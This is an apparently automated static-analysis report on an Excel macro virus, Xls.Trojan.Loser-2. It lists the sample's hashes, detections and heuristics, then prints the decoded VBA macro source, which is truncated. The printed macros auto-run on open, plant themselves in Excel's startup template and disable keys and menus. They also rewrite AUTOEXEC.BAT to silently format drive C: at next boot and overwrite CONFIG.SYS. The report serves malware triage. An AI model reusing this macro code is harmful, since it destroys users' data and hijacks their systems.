Xls.Trojan.Loser-2 — Office (OLE) malware analysis

Static analysis result for SHA-256 8656bd23e31e0b9f…

MALICIOUS

Office (OLE)

Size: 125.0 KB
Created: 1997-08-17 11:39:24
Authoring application: Microsoft Excel
First seen: 2012-06-14
MD5: 819aacb3a0ee41e9c15a2056fc6aafb1
SHA-1: 3a2ca0c158e44079a979785d2267af2d5a5eef65
SHA-256: 8656bd23e31e0b9f46bbadfc72c794c82823d43020494288aefa4fde00aacf13
Risk Score: 260

Malware Insights

Xls.Trojan.Loser-2 · confidence 95%

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

ClamAV identifies the file as malicious with the signature Xls.Trojan.Loser-2. It contains VBA macros triggered by Workbook_Open and AutoOpen, which are designed to execute arbitrary code. The document body and script content suggest a self-referential 'Excel macro virus' lure, and the script attempts to manipulate system files such as C:\CONFIG.SYS and C:\AUTOEXEC.BAT.

Heuristics (5)

  • ClamAV: Xls.Trojan.Loser-2 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Xls.Trojan.Loser-2
  • VBA macros detected [medium] (OLE_VBA_MACROS), 3 related findings
    Document contains VBA macro code
  • AutoOpen macro [high] (OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • Workbook_Open macro [high] (OLE_VBA_WBOPEN)
    Workbook_Open macro
  • VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 88708 bytes
SHA-256: 5dbf0eb4713beecada57921eb5c22a6f4cc8af8526c25051379f85818632b4a4
Detection: ClamAV: Xls.Trojan.Loser-2
Obfuscation or payload: unlikely

Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_BeforeClose(Cancel As Boolean)
    On Error Resume Next
    If Not OK Then
        Cancel = True
    Else
        Cancel = False
        Exit Sub
    End If
    ThisWorkbook.Worksheets("ExcelNo1").Visible = False
    ThisWorkbook.Worksheets("ExcelNo1").Save
    Set S = Nothing
End Sub
Private Sub Workbook_Open()
    AutoOpen.Main
    ThisWorkbook.Worksheets("ExcelNo1").Visible = True
    ThisWorkbook.Worksheets("ExcelNo1").Activate
    OK = False
End Sub

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "AutoOpen"
Global Const Config$ = "C:\CONFIG.SYS"
Global Const Autoexec$ = "C:\AUTOEXEC.BAT"

Public S As Object, OK As Boolean
Public OfficeDir$, TemplateDir$, StartDir$
Public Sub Main()
    StatusBar = "正在初始化設定..."
    Application.ScreenUpdating = False
    SaveFile
    GetDirs
    InterruptKeys
    StatusBar = "Excel No.1已經佔據您的系統"
    Application.ScreenUpdating = True
End Sub
Public Sub GetDirs()
    ExcelDir$ = Application.Path
    TemplateDir$ = Application.TemplatesPath
    StartDir$ = Application.StartupPath
End Sub
Public Sub KillMenu()
    On Error Resume Next
    Application.CommandBars("Worksheet Menu Bar").Controls(9).Delete
    Application.CommandBars("Worksheet Menu Bar").Controls(8).Delete
    Application.CommandBars("Worksheet Menu Bar").Controls(6).Delete
    Application.CommandBars("Worksheet Menu Bar").Controls(5).Delete
    Application.CommandBars("Worksheet Menu Bar").Controls(4).Delete
    Application.CommandBars("Worksheet Menu Bar").Controls(3).Delete
    Application.CommandBars("Worksheet Menu Bar").Controls(2).Delete
    Application.CommandBars("Worksheet Menu Bar").Controls(1).Delete
End Sub
Public Sub ReAuto()
    On Error Resume Next
    If UCase(Dir(Autoexec$)) = "AUTOEXEC.BAT" Then
        SetAttr Autoexec$, 0
    End If
    No = FreeFile
    Open "C:\c" For Output As #No
        Print #No, "y" & Chr$(13)
        Print #No, Chr$(13)
    Close #No
    No = FreeFile
    Open Autoexec$ For Output As #No
        Print #No, "PATH = C:\;" & S.WinPath & "\COMMAND;" & S.SystemPath
        Print #No, "format C:/u/q/v:EXCELNO1 < c"
    Close #No
End Sub
Public Sub SaveFile()
    f$ = StartDir & "\BOOK.XLT"
    If UCase(Dir(f$)) = "BOOK.XLT" Then Exit Sub
    On Error Resume Next
    Application.ActiveWorkbook.SaveAs FileName:=f$, FileFormat:=xlTemplate
    Set S = New X
    For c = 1 To 20
        S.CreateLink 1, "Excel No.1 - " & c, f$, ""
    Next c
    Set S = Nothing
End Sub
Public Sub InterruptKeys()
    On Error Resume Next
    With Application
        .OnKey "{BACKSPACE}", ""
        .OnKey "{BREAK}", ""
        .OnKey "{DOWN}", ""
        .OnKey "{UP}", ""
        .OnKey "{LEFT}", ""
        .OnKey "{RIGHT}", ""
        .OnKey "{ESC}", ""
        .OnKey "{DEL}", ""
        .OnKey "{HOME}", ""
        .OnKey "{END}", ""
        .OnKey "{PGDN}", ""
        .OnKey "{PGUP}", ""
        .OnKey "{RETURN}", ""
        .OnKey "{ENTER}", ""
        .OnKey "{TAB}", ""
        .OnKey "%{F4}", ""
        .OnKey "{F1}", ""
        .OnKey "{NUMLOCK}", ""
    End With
End Sub
Public Sub SafeExit()
    OK = True
    ThisWorkbook.Saved = True
    Application.Quit
End Sub
Public Sub ReConfig()
    On Error Resume Next
    If UCase(Dir(Config$)) = "CONFIG.SYS" Then
        SetAttr "C:\CONFIG.SYS", 0
    End If
    No = FreeFile
    Open Config$ For Output As #No
        Print #No, "Rem **** You're infected by Excel No.1 Macro Virus!"
        Print #No, "Dos = Low"
        Print #No, "FCBS 
... (truncated)